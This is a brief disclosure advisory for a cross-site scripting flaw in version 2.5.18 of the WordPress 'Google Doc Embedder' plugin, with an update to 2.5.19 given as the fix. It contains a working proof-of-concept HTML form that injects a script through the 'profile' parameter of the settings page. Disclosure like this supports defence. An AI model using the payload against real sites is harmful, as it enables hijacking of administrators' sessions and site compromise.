Title: WordPress 'Google Doc Embedder' plugin - XSS
Version: 2.5.18
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/google-document-embedder/
Contacted WordPress: 2015/01/26
==========================================================

## Description: 
==========================================================
Lets you embed PDF, MS Office, and many other file types in a web page using the free Google Docs Viewer (no Flash or PDF browser plug-ins required). 


## XSS:
==========================================================
By tricking a logged in admin into visiting a crafted page, it is possible to perform an XSS attack through the 'profile' parameter.

PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=gde-settings"> 
	<text>action: </text>
 	<input type="text" name="action" value="edit" READONLY><br />
 	<text>profile: </text>
	<input type="text" name="profile" value="&quot;><script>alert(1);</script>"><br />
	<input type="submit">
</form>


## Solution
==========================================================
Update to version 2.5.19.